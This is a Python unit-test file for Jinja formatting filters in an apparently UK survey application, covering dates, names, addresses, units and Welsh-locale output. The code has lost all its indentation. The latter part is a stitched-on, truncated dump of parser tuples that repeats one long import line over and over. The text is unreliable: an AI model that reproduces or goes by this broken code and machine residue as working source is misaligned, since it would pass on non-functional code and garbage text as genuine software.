with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
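# The pair of datetime tests above shows output is localised to Europe/London:
# the same 11:59 UTC wall time renders as 12:59 during British Summer Time
# (March) and as 11:59 once the clocks revert to GMT (October).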
def test_format_conditional_date_not_date(self):
# Given invalid date strings (the integer type check was removed from jinja_filters, so only strings are exercised here)
invalid_input = [('1', None),
('1-1-1', None)]
# When
for date1, date2 in invalid_input:
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for date1, date2, expected in datelist:
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=expected))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today() + relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for start_date, end_date, expected in date_list:
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, expected)
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
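# Note the leap-day cases above: a 2016-02-29 start counts 2017-02-28 as one
# whole year and 2020-02-28 as three, i.e. the difference is measured in
# completed years (presumably relativedelta semantics), not naive subtraction.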
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John J Doe')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Doe\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Does\u2019')
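# Possessive formatting follows the usual English rule pinned down above:
# names ending in 's' take a bare right single quote (John Does\u2019) while
# all others take \u2019s (John Doe\u2019s); fully Undefined names yield None.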
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
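# A minimal sketch of the mapping the four assertions above imply; this is an
# illustrative assumption, not the filter's actual implementation.
def _alphabetic_letter_sketch(index):
# Zero-indexed a-z; anything outside 0-25 (e.g. -1) yields ''.
return chr(ord('a') + index) if 0 <= index <= 25 else ''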
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
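# Taken together, the duration tests show format_duration pluralises each
# present key independently ('1 year 1 month' vs '5 years 4 months') and
# renders zero as '0 months' or '0 years' rather than an empty string.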
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
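# A hedged sketch of the comparison rule the max_value/min_value tests pin
# down; the shape is an assumption, only the behaviour is taken from the
# assertions above.
def _max_value_sketch(a, b):
# None operands are skipped: max_value(1, None) == 1 above.
if a is None:
return b
if b is None:
return a
try:
return max(a, b)
except Exception:
# The real filter must also cope with jinja2 Undefined; the message
# shape matches the assertions above.
raise Exception('Cannot determine maximum of incompatible types '
'max({}, {})'.format(type(a), type(b)))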
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous Sunday with a -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous Sunday with a +1 week offset, back to the input date
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Unknown offset keys are ignored: previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for input_date, offset, day_of_week, expected in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(input_date, offset, day_of_week), expected)
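# The cases above define 'last whole week' strictly: the target weekday must
# have fully elapsed, so a Sunday input maps to the previous Sunday, and
# unknown keys in the offset dict (e.g. 'bad_period') are silently ignored.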
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
# (Input Date, date format, expected output)
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for input_date, date_format, expected in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, input_date, date_format),
"<span class='date'>{}</span>".format(expected)
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for start_date, end_date, date_format, expected_first, expected_second in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, start_date, end_date, date_format),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(expected_first, expected_second)
)
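# The table above suggests the first date is trimmed only where a finer-grained
# component remains to display: a shared year (or shared month and year) is
# dropped from the first date, but 'August 2018' to 'August 2018' stays in
# full because nothing smaller than the repeated parts would be left.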
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['John Smith', 'Jane Smith', 'Sarah Smythe']),
([['John', 'Smith']], ['John Smith']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['John Smith', 'Andy Smith', 'David Smith']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['Jane Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['David Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', 'Sarah Smith']),
([['John', 'Smith'], [[], []]], ['John Smith'])
]
for input_list, expected in test_cases:
format_repeating_summary(None, input_list)
# format_unordered_list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in expected]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_none_values(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
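# A hedged sketch of the fallback the address tests above exercise (an
# assumption for illustration, not the real implementation): prefer non-empty
# user-entered lines, fall back to metadata, and raise when neither has any.
def _format_address_list_sketch(user_entered, metadata):
lines = [line for line in user_entered if line] or [line for line in metadata if line]
if not lines:
raise Exception('No valid address passed to format_address_list filter')
return '<br />'.join(lines)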
get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((32, 25, 32, 60), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(32, 51, 32, 56): '"""100"""', (32, 58, 32, 59): '(2)'}, {}), "('100', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((33, 25, 33, 62), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(33, 51, 33, 58): '"""100.0"""', (33, 60, 33, 61): '(2)'}, {}), "('100.0', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((34, 25, 34, 63), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(34, 51, 34, 59): '"""100.00"""', (34, 61, 34, 62): '(2)'}, {}), "('100.00', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((35, 25, 35, 58), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(35, 51, 35, 57): '"""1000"""'}, {}), "('1000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, 
calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((36, 25, 36, 59), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(36, 51, 36, 58): '"""10000"""'}, {}), "('10000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((37, 25, 37, 63), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(37, 51, 37, 62): '"""100000000"""'}, {}), "('100000000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((38, 25, 38, 66), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(38, 51, 38, 62): '"""100000000"""', (38, 64, 38, 65): '(2)'}, {}), "('100000000', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((39, 25, 39, 56), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(39, 51, 39, 52): '(0)', (39, 54, 39, 55): '(2)'}, {}), '(0, 2)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, 
calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((40, 25, 40, 53), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(40, 51, 40, 52): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((41, 25, 41, 54), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(41, 51, 41, 53): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, 